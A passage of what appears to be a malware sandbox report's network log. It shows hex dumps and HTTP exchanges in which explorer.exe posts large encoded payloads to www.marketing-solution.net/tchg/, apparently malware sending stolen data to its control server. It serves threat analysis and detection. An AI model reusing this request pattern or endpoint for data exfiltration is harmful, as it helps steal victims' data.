43 7a 68 30 6d 38 65 36 38 53 4e 78 41 45 6b 66 31 70 79 75 68 57 39 72 53 47 65 78 52 70 6f 66 33 76 41 49 6f 6a 6c 35 4c 58 67 7e 78 57 62 33 74 62 47 33 6b 50 66 70 55 31 46 4d 75 54 35 51 44 4f 68 78 51 4e 32 38 37 66 71 57 50 39 6b 71 6a 65 61 78 68 31 7a 4d 4d 52 49 58 52 6a 4f 56 47 28 4a 67 6c 78 69 59 31 59 4c 34 57 49 52 32 55 38 6f 4b 6f 46 6b 72 7a 77 73 54 37 4f 77 41 55 56 76 68 46 54 41 78 79 35 72 73 54 64 42 76 66 4b 44 59 50 7a 76 77 39 58 64 28 66 30 6d 64 71 63 5a 59 63 77 47 7a 34 78 4c 47 59 77 6c 6f 48 55 68 73 74 54 64 52 63 65 32 52 59 42 39 59 5a 72 56 56 53 43 41 58 6b 50 46 41 4a 30 36 61 2d 37 37 41 6c 49 38 71 30 4a 38 36 43 4e 6f 75 76 4a 6d 34 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=lTG_iZQ1e8rTXeGCjAmoZogRq26E4_3YOqHuAC9tuR3FLcF3xgem(v2Eh2py~fBg(S~Ej4qxzOOsY2WzT1A_KdnbM9IUKge0iYEuAQvAt_Gh0vOO52489E(9JwiGsl74mLmG(ABg24mQgSO4NrpeW6JobeAw2B9hHvRS8c(zFHdokI1jDZP84y7jgW(UhcFtuznpr3XfyN0eIAkAmf(5gkYloY0SV1wVJbv0fxzfVmLNMldYDMJzZKXgf3aov-yOe2xixNFpEfJabpHv2JeTodj_ZropP8BX528Czh0m8e68SNxAEkf1pyuhW9rSGexRpof3vAIojl5LXg~xWb3tbG3kPfpU1FMuT5QDOhxQN287fqWP9kqjeaxh1zMMRIXRjOVG(JglxiY1YL4WIR2U8oKoFkrzwsT7OwAUVvhFTAxy5rsTdBvfKDYPzvw9Xd(f0mdqcZYcwGz4xLGYwloHUhstTdRce2RYB9YZrVVSCAXkPFAJ06a-77AlI8q0J86CNouvJm4.
                                                                                                                    May 30, 2023 11:13:01.264862061 CEST1665INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:13:00 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Last-Modified: Mon, 02 Jul 2018 00:27:42 GMT
                                                                                                                    ETag: W/"afe-56ff9440f72fb"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7 e2 05 6c c7 f5 d7 36 e3 4d ba 31 95 3f b4 8f fa 74 81 87 7a dc ed 23 7e 32 ad 1b 44 7c b6 d7 b6 57 b2 ab f8 cf c4 9f be 02 ca f7 7a d5 37 d6 99 ae 81 06 94 74 21 39 dd 29 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b
                                                                                                                    Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r[
                                                                                                                    May 30, 2023 11:13:01.264940977 CEST1666INData Raw: 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64
                                                                                                                    Data Ascii: ,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    9192.168.11.204976891.195.240.4580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:08:27.040822983 CEST343OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.marketing-solution.net
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.marketing-solution.net
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.marketing-solution.net/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 59 6a 57 74 75 6c 67 6b 50 46 69 4e 52 74 33 54 50 4d 28 54 43 62 75 41 55 4f 56 45 76 6b 31 53 69 36 67 44 30 52 44 4f 42 78 44 70 4a 34 57 5a 6b 6a 69 54 56 56 4b 4d 78 6e 54 5f 30 7a 6b 7a 7e 59 66 32 4e 69 41 70 65 4c 37 44 59 55 46 31 6d 34 48 31 70 32 45 39 4d 47 38 6c 7a 55 49 75 4c 6c 31 48 41 42 59 34 72 50 68 38 56 51 6a 51 73 54 31 6a 36 5f 7a 73 68 48 57 56 58 7a 78 5a 5a 48 6f 55 75 5a 6c 6c 53 68 4f 45 53 71 35 64 47 7a 43 46 7e 4f 4b 44 53 33 56 38 6e 59 48 5a 39 5f 64 42 75 46 47 66 6c 2d 78 67 52 74 44 4c 45 44 34 54 4d 5a 4c 6a 71 72 31 6a 4c 44 71 48 70 37 47 63 78 44 77 6d 42 51 37 33 58 68 7a 35 33 2d 37 79 43 47 47 73 32 47 44 4d 76 6f 69 7a 48 6a 46 6f 78 71 39 63 6c 6b 42 6b 78 43 35 67 4a 56 6b 4d 6a 47 62 55 76 6a 66 6b 32 79 53 68 37 57 33 78 6e 71 28 43 69 32 36 53 61 6a 4c 67 4b 5a 6e 51 38 38 75 50 4e 55 4f 7a 56 4b 30 52 7e 6d 73 44 4c 61 56 75 31 6e 78 59 7e 75 57 73 77 59 28 78 61 42 37 5f 46 68 45 66 6b 4f 73 31 76 74 53 6d 7a 65 38 71 58 38 59 56 51 7a 30 57 64 69 4a 46 52 48 69 53 77 51 56 42 47 78 38 6d 50 6b 4a 65 31 67 6c 68 55 72 72 74 69 66 75 4d 52 4d 74 53 76 66 4c 43 7e 73 4f 74 76 37 59 6c 50 35 41 6e 5a 56 74 72 57 4c 59 6f 57 62 6b 6f 36 76 57 5f 33 50 6e 75 59 54 65 58 52 42 7a 6b 4c 75 50 68 47 70 41 4b 79 5a 38 38 77 59 73 70 48 44 38 66 4f 67 44 30 6b 74 4c 64 35 59 52 4b 4d 61 47 67 49 6b 50 46 70 5a 71 78 39 4a 53 37 41 50 30 4b 4a 70 43 56 30 70 78 4c 52 44 6a 73 5a 61 5a 77 45 62 36 33 7e 54 68 46 37 4a 39 6c 51 45 46 67 43 63 49 5a 48 58 37 53 75 54 32 54 28 4a 33 31 51 48 44 58 5a 4b 62 43 67 44 28 77 73 6c 6e 57 6c 66 43 35 58 36 53 53 71 45 67 51 30 65 74 75 61 73 79 6c 61 36 7a 6a 61 33 28 6b 64 75 75 63 32 64 42 47 6a 6b 56 39 28 66 28 76 72 65 6b 34 76 78 67 59 51 47 68 79 66 38 79 61 32 57 62 6a 71 4d 5a 56 43 69 7a 44 6b 31 51 79 50 6a 4a 78 71 41 46 6d 39 33 49 51 78 4f 63 58 37 57 45 43 36 73 4c 32 56 30 50 66 68 5a 68 53 7e 51 59 50 28 48 77 31 42 5f 69 5a 6d 58 4e 38 6c 46 54 2d 47 33 66 7a 31 37 64 4e 6a 66 68 4b 72 36 77 58 58 45 6b 68 4f 64 79 44 31 5f 41 61 34 35 53 49 31 70 66 78 65 68 64 65 38 52 51 52 54 56 6f 6e 4e 43 48 55 69 55 4b 66 4b 46 4c 38 56 51 56 6a 70 5f 46 57 43 6b 6f 75 43 4a 37 5a 57 66 73 4b 64 72 71 57 6c 65 30 53 74 48 72 6d 43 75 77 7a 38 69 62 59 52 7a 28 2d 54 6e 79 53 34 32 69 56 61 53 44 36 59 61 39 32 4a 49 51 73 32 56 4a 4a 55 64 54 4f 42 6d 4c 71 66 52 7a 75 28 34 32 41 4e 47 69 56 78 75 49 5f 47 48 4d 44 71 4c 79 74 30 74 67 71 49 78 75 6e 4c 4a 6d 39 45 52 65 4d 58 42 63 37 65 59 35 7a 5a 4e 6e 58 47 62 63 48 7e 6b 77 32 59 78 73 48 59 49 4f 70 7e 7a 4d 49 28 4c 42 76 59 5f 52 38 6b 6e 73 50 6e 4f 73 58 56 73 4d 38 6a 62 61 54 34 71 33 44 55 4a 71 78 64 77 4f 67 38 42 73 63 65 63 7a 32 4c 70 36 5f 56 67 41 56 58 4d 37 69 71 47 4f 32 38 49 57 35 56 4c 39 43 54 41 6a 69 73 52 79 52 62 6c 36 6f 55 54 38 71 4c 63 42 62 49 41 73 78 33 59 66 2d 79 59 69 4d 4a 4a 51 68 47 43 6d 47 63 6f 56 45 38 4e 50 68 50 7a 6a 41 74 61 41 46 4e 35 37 30 67 79 46 7a 51 35 44 73 62 39 49 48 52 56 6f 49 6d 71 44 63 37 57 54 38 42 4b 6b 79 4e 46 38 5a 53 4f 6d 4a 43 59 73 44 39 75 5a 57 4e 39 49 6e 46 5f 32 4f 69 78 35 77 6b 7a 5a 30 36 70 6b 44 71 7a 31 6f 66 65 6e 58 33 6f 59 68 79 52 67 37 6b 74 33 4b 66 50 42 54 59 41 45 56 59 55 76 73 49 65 50 31 4b 4a 67 52 63 78 58 50 43 30 72 77 75 4b 61 42 38 76 6b 69 73 6d 4e 6a 76 6b 51 73 42 54 72 73 71 76 47 50 4e 49 5a 35 62 50 54 64 63 68 4f 4a 48 32 7e 51 4f 75 68 6e 42 63 78 64 75 57 59 4d 4c 37 70 4b 39 4b 72 6a 7e 30 35 42 70 66 4e 55 33 45 58 4e 77 6f 74 54 59 32 58 4c 66 75 41 49 71 63 52 70 49 50 66 6c 42 50 37 65 41 39 51 71 7e 49 7a 51 52 6c 76 49 38 41 54 50 47 52 58 79 50 6e 4d 6d 6d 58 36 70 57 48 39 6a 79 6b 51 6a 68 58 5a 75 63 48 4a 57 38 4a 34 37 61 30 56 50 7e 59 52 41 7e 6e 75 78 48 38 76 55 39 41 4a 41 76 79 42 6b 44 44 6f 4b 79 75 66 55 78 49 6f 47 37 67 55 74 50 6e 38 73 41 53 62 41 51 44 5a 4f 58 5a 79 5f 4f 34 38 53 6f 64 31 54 70 46 4f 50 51 53 6f 35 45 45 6b 56 77 30 6a 37 50 44 41 49 56 69 7e 53 7e 76 46 45 6f 36 71 6e 50 36 4c 79 75 4a 36 75 7e
                                                                                                                    Data Ascii: O0qEM=YjWtulgkPFiNRt3TPM(TCbuAUOVEvk1Si6gD0RDOBxDpJ4WZkjiTVVKMxnT_0zkz~Yf2NiApeL7DYUF1m4H1p2E9MG8lzUIuLl1HABY4rPh8VQjQsT1j6_zshHWVXzxZZHoUuZllShOESq5dGzCF~OKDS3V8nYHZ9_dBuFGfl-xgRtDLED4TMZLjqr1jLDqHp7GcxDwmBQ73Xhz53-7yCGGs2GDMvoizHjFoxq9clkBkxC5gJVkMjGbUvjfk2ySh7W3xnq(Ci26SajLgKZnQ88uPNUOzVK0R~msDLaVu1nxY~uWswY(xaB7_FhEfkOs1vtSmze8qX8YVQz0WdiJFRHiSwQVBGx8mPkJe1glhUrrtifuMRMtSvfLC~sOtv7YlP5AnZVtrWLYoWbko6vW_3PnuYTeXRBzkLuPhGpAKyZ88wYspHD8fOgD0ktLd5YRKMaGgIkPFpZqx9JS7AP0KJpCV0pxLRDjsZaZwEb63~ThF7J9lQEFgCcIZHX7SuT2T(J31QHDXZKbCgD(wslnWlfC5X6SSqEgQ0etuasyla6zja3(kduuc2dBGjkV9(f(vrek4vxgYQGhyf8ya2WbjqMZVCizDk1QyPjJxqAFm93IQxOcX7WEC6sL2V0PfhZhS~QYP(Hw1B_iZmXN8lFT-G3fz17dNjfhKr6wXXEkhOdyD1_Aa45SI1pfxehde8RQRTVonNCHUiUKfKFL8VQVjp_FWCkouCJ7ZWfsKdrqWle0StHrmCuwz8ibYRz(-TnyS42iVaSD6Ya92JIQs2VJJUdTOBmLqfRzu(42ANGiVxuI_GHMDqLyt0tgqIxunLJm9EReMXBc7eY5zZNnXGbcH~kw2YxsHYIOp~zMI(LBvY_R8knsPnOsXVsM8jbaT4q3DUJqxdwOg8Bscecz2Lp6_VgAVXM7iqGO28IW5VL9CTAjisRyRbl6oUT8qLcBbIAsx3Yf-yYiMJJQhGCmGcoVE8NPhPzjAtaAFN570gyFzQ5Dsb9IHRVoImqDc7WT8BKkyNF8ZSOmJCYsD9uZWN9InF_2Oix5wkzZ06pkDqz1ofenX3oYhyRg7kt3KfPBTYAEVYUvsIeP1KJgRcxXPC0rwuKaB8vkismNjvkQsBTrsqvGPNIZ5bPTdchOJH2~QOuhnBcxduWYML7pK9Krj~05BpfNU3EXNwotTY2XLfuAIqcRpIPflBP7eA9Qq~IzQRlvI8ATPGRXyPnMmmX6pWH9jykQjhXZucHJW8J47a0VP~YRA~nuxH8vU9AJAvyBkDDoKyufUxIoG7gUtPn8sASbAQDZOXZy_O48Sod1TpFOPQSo5EEkVw0j7PDAIVi~S~vFEo6qnP6LyuJ6u~PenkeC02HyZrzsvzT6MPEAnttsGmPjTBvZpjShkWpPjH7lDUtK0xPqclTJXr_SO9JCwYpy599LLgzsV1-80O9FNa56_bez0N8BPg_0tm9f7RqWvdHLFXFo_KAYBVxZ70j9uHaVEj3QVkoRWA107pcrcCdTaN4odSWrxNoXTpJ0_P_qnG92CgH0TfhLpZWxA6YPVYsgDxfjJ26b_XJpFR0~cQfvKcTkiZAvoqaoMVNdA4zsXsEhkDJSadcjxe4gx6keYQIj73caukVoemefMwouusxqXLSivNoOF(8wC1i~SiZ07fzfWY4nSMKq5YiHykfqxv8JJ9BSQBiBEugZr1agA~i~mfHHk5WJFd7jGhwZFO2A_y58vKM7bbWBTgtBtdTrgiHWY53vnZFCF7_y_D_wC6zDw3eqEN-jkKjN1xxBBMx42D1l_VyMuwYrZROBVibDM51er0teZZb2UXz6ARKlVVWhYbyOYU6jx4CIZZwZLkMjoUmN4h7uDygpJBSRTh9WGb5vPw3HxkOI51xawOUvRY_(NIkiVk9ZDVAWFJEEZv9JGZMUtRrC7VYSZ9NVJbRZP7iKJ291fjbgXaDVBnkMOvhho4D50AMBGiZl2EToraQUeAD0p4dvrhZvlQFUJB7sPKRdeqRHy6SWWTvLKv0KugS9xw9UUm2Ku0iGbM_(fZLpQywX_WIG76MulsGab(rS6ZpjpYTAKo6G4iAU2MEujKpt_TPu3(YYVVTwxpp2yqFL1YJRZAo9FYZi9D9Z-1XzUMD3MdAw5t9TCNdgsMaAqYLuykakVWWN6vxhnXGh-CP8FlHS8YuznOmxjmfZhre74Ol~LCGOiLys30qnvLzRIQff2aC(wG77FqWJYq1mMO_IJColqvU83NNBr2Yru1wA-2DDRPvxF(9XRoDPPHPhw69OQIKxBFGf6hQXNs923HBxiaKGDg59ydb04slG67B1oyOoTUA2_dvgIEIgm5g16fgPTtS5KovMSqBCbjTL7C69oezAiMJ(_unCobjnZ2VHOD30mUHPVTxOh4nIZA-7XCps2WSzlniLkIeBAgrW58iAlMOA0yYpV7e6Q~GAnP8vDy178YLbJ2Nvzsu3r35FaeKVDUJW4Rl5SczxVnYFPIILTo30GSaFHX_divsUUNXXvcvVZukAlRDU61oTLNR(5ZoDYldYNC6LkpnDlX-GJdvl7J42WWnNLdk1JUq2CmNmnU4ZY(1A3UZzE3mfBD4(frjEVx1SFOMdFfdGI1aU5IcY8T-unaeEPDPEF(9JUbSbtaTIR8fxfTjiJ9XHndAQzDynLjo~JFZZdncClLtFMArrixePQDO0fMKClMqGa~PHj~PemLikSpLLaVRMGG2j3Fgt0idt8iJnluVw01eZ9x4swCEZfbaj6zKnM6ieNH0hUTh0lfWcspP1EvSId0qd5roKWKdVpj0pcxgvqw7(C30LSG4Hd04k716(h2p4G4XgfUN~fRwC19H14WhgWxuXCYZDYxsVNKT38HCHztU35uTAX9UAB6D8n9Jm3cXENzs4-KfSFJcMkF0rdmPv7BFQl0TA9IZjn(Ki7LO72qFmNJEyX7PoMX0a9dL7SO8OsD50bWrw_Pr4yKNH65lrMtxRiuoirMEswdLqIGFQS8zbdEmBb7zznuIh7hYztWUZIu2KK4834mm8KeYDDx7MSiKM_oqrRnWea5xTwuQJnwGEfQCXZRnbLbHuoUxpivnNz~vHdhD(KaA7aoWaQDt(WeAwfPTed0rQgtEedUyVVSdKS2oDAvD6tg_KMQw(FSbqHHgUupn4TP-XBB2Nnl62BThVhpHh0PpgUvk8QbNXweNgpcOU7(WK9y_QND04NHvBwSnUyMRwuI1rZhSmXOvy5iJAR41IY(3kfl2reRrnVKkrZ~u4tLoLmCeaU3Q3Bqzv6qw4WH5vhtLMY7HD7QQEwfltIoHf6NIot1VUEU-iaNN9j7MktgEKbwpWT~qvdf9MnntAKEL7fkO8VuRqSYwtf7JHhRIcqqDyvxq6jEzddN8xChJV-44oX19ZEoO1HOsrm2XeohmoEtIDI4CsYpYDoeg~-x0uhxHr_aynYEdLR2yatzqHWKOkTBZGxvdPQLs1gsyIXoEcj9WRpf4pccb2DZyjI5MdAqtPHUaZUTANQGllABAIB6rMbhUs1W0Al34NVR10203Tt54oz~5ttGeiMSpvmbT70bPhLjsM5zsDH7J9nsQwH5yiXjI5-pujXl4vCafipzxvThlomAGImZgeR6bECezjVHYodzQu51u686GngMoN1cwDw0TQKmjdSb7xWKavsIoJ3DR342uS-6mvLHG2MWZHOt7JEtMONu5srCp3nUakGiZRZo7g8cmA6ROxz1jkHQbd1F8Q-dvoYrbPDfXLF8PhQR3kORZUpUYTQRHnyeVIzKeaNWpbU9Xg0z2x5m2X0ymgG7KbtF5xgM-7S2ifnK2rZvD2ZbK6VlZKnx-n7n8(Tzqt9wgsg1mZvbkV7bItFVEk-soumsFTFEGmkVKsH457ejf402RkGVunkrs71UFsE7Xg-HuqaCgey7X~q(hIXc5iSZ3QjW88FIrdOlXnVf6nGQFwXk3NgIGezvhYgymFQzog1VOhxnbtD(SwPmbb4r5~2(98wA5VwFLxN6Ay7NGeAgVeXV6M0NZXJ0s0vDeB2UVpUdLx9ZYPblKCvrAOvR-yInebymzXka40SgIja~vMdWkVRc33N
                                                                                                                    May 30, 2023 11:08:27.040904999 CEST350OUTData Raw: 70 32 30 70 45 53 65 36 61 53 36 68 6e 31 50 74 39 61 28 4a 4f 49 73 53 65 77 31 63 31 72 7e 73 59 4b 50 59 58 6e 73 65 70 72 56 77 52 46 5a 6c 39 33 36 79 33 47 4f 67 69 4b 59 31 6c 42 4a 54 54 51 42 68 67 50 49 78 78 51 30 77 55 5a 7e 46 59 5f
                                                                                                                    Data Ascii: p20pESe6aS6hn1Pt9a(JOIsSew1c1r~sYKPYXnseprVwRFZl936y3GOgiKY1lBJTTQBhgPIxxQ0wUZ~FY_(jLRKEx2pYCuV77sTs3aePraSQ5qqYeYyMuSnITHteuqW6ARnPXzpw8fQlhITXLGdw72yd9zxRzBuWYi3IT8zLUCABIy8ntRbMcvkaugzr0Wf3UQ4jgLYocgMxmIlnURuJ9e7hLSs_uos6FpDBGeuGanoC7s2F0QI
                                                                                                                    May 30, 2023 11:08:27.052150965 CEST352OUTData Raw: 7e 38 66 75 68 77 51 51 74 51 65 5a 61 6e 6b 6a 6b 34 49 68 41 67 6b 4c 33 4c 37 55 33 7a 31 72 67 30 28 4b 32 71 4d 58 4b 77 32 71 72 5a 76 70 48 4b 71 6f 50 76 55 45 44 30 77 2d 32 51 67 58 54 48 62 6c 67 64 36 33 75 38 55 32 6d 63 78 65 43 31
                                                                                                                    Data Ascii: ~8fuhwQQtQeZankjk4IhAgkL3L7U3z1rg0(K2qMXKw2qrZvpHKqoPvUED0w-2QgXTHblgd63u8U2mcxeC1cFD6gAOs2gQjvC~QzwLPouhE0P6CDB7rxip3wsuPTAgbWALDPD7rjyLGAfRF5Ac9sWYUtwVcxgTxx1jwRb5rExRAlsNoxeWv3L7azua-N1Y-ByYdOE~Vj0VGKBZGiQx7oMnPj9tuYUPVmaXCJUyptBkYuo5O32vY3
                                                                                                                    May 30, 2023 11:08:27.052330017 CEST354OUTData Raw: 4e 56 47 56 67 35 47 4a 37 61 75 47 71 31 31 45 34 4e 43 58 6f 63 70 57 55 75 63 69 53 71 6b 35 42 31 4e 48 76 5f 30 70 78 30 56 58 68 54 48 6b 64 61 53 2d 71 72 52 61 48 6f 72 56 75 4a 64 65 77 5a 56 41 76 47 4d 44 74 76 4a 72 55 49 6c 76 76 4f
                                                                                                                    Data Ascii: NVGVg5GJ7auGq11E4NCXocpWUuciSqk5B1NHv_0px0VXhTHkdaS-qrRaHorVuJdewZVAvGMDtvJrUIlvvO7Qn2iCdKK-TdQBjMEatZa_QOpRPsUmeEnWn4eXK24NrZKYry0FUgXW6irsnw(NMRYyO4LZkooRlUNMN8GSVVzFCLprzlnFCEXcKZZ223O0UR3ZDlF431PyJPAH73BygYxY9XCG1_UY1T(1Skd3mIbAzsx3lYbldW7
                                                                                                                    May 30, 2023 11:08:27.052493095 CEST362OUTData Raw: 59 70 74 4b 6c 71 30 47 32 36 63 35 7a 62 48 6e 74 49 7a 53 7a 31 53 75 51 5a 4f 72 65 53 62 67 37 57 49 72 51 47 42 43 7a 35 36 79 42 76 72 49 70 74 79 6d 49 4b 66 6a 36 78 37 57 49 68 53 73 58 69 43 53 77 45 62 78 67 5a 6e 56 64 38 4c 56 6b 69
                                                                                                                    Data Ascii: YptKlq0G26c5zbHntIzSz1SuQZOreSbg7WIrQGBCz56yBvrIptymIKfj6x7WIhSsXiCSwEbxgZnVd8LVkiZOIJydTIhx3LJaeazrg0KM9ySFrY78ntJkNFe-quTSQXpi1pXJApRaO1nr0LWmq12CfPfFWD7Hv8TtHJL9pX~TQK9UU24M9bhhcgTNlWZ1vAxItJY-Nz1fdC1q86plffyzMaS6qnPmn79HdLpjTTmR~oZhcIt-AqQ
                                                                                                                    May 30, 2023 11:08:27.052562952 CEST362INHTTP/1.1 403 Forbidden
                                                                                                                    date: Tue, 30 May 2023 09:08:27 GMT
                                                                                                                    content-type: text/html
                                                                                                                    transfer-encoding: chunked
                                                                                                                    vary: Accept-Encoding
                                                                                                                    server: NginX
                                                                                                                    content-encoding: gzip
                                                                                                                    connection: close
                                                                                                                    Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
                                                                                                                    May 30, 2023 11:08:27.052658081 CEST367OUTData Raw: 4a 47 63 52 5a 35 43 6b 75 34 45 6e 55 6c 67 46 4f 74 6a 6c 31 69 45 78 6e 4a 61 69 53 49 74 6c 4b 33 4a 4b 58 45 75 46 7a 48 63 64 32 77 39 62 28 6d 39 78 67 5a 33 6a 54 61 31 45 4d 43 4b 70 57 76 47 47 61 31 30 39 37 57 28 66 63 36 69 63 4d 51
                                                                                                                    Data Ascii: JGcRZ5Cku4EnUlgFOtjl1iExnJaiSItlK3JKXEuFzHcd2w9b(m9xgZ3jTa1EMCKpWvGGa1097W(fc6icMQqyIS3rnpBCbahg5CAtTKAAX8nTCgKknfMqm1N4rKRr(_H8MaAK9Cp5ZePFAR2ky2mEhA80N3lDdQPfwdAOby(FzDsXc6g_YCQN3oovtOcD2aiiUteyMDjM2jrAlCKfb_QkcmlMg28nU6EwPn73F0ohKNmmDBIQbnb
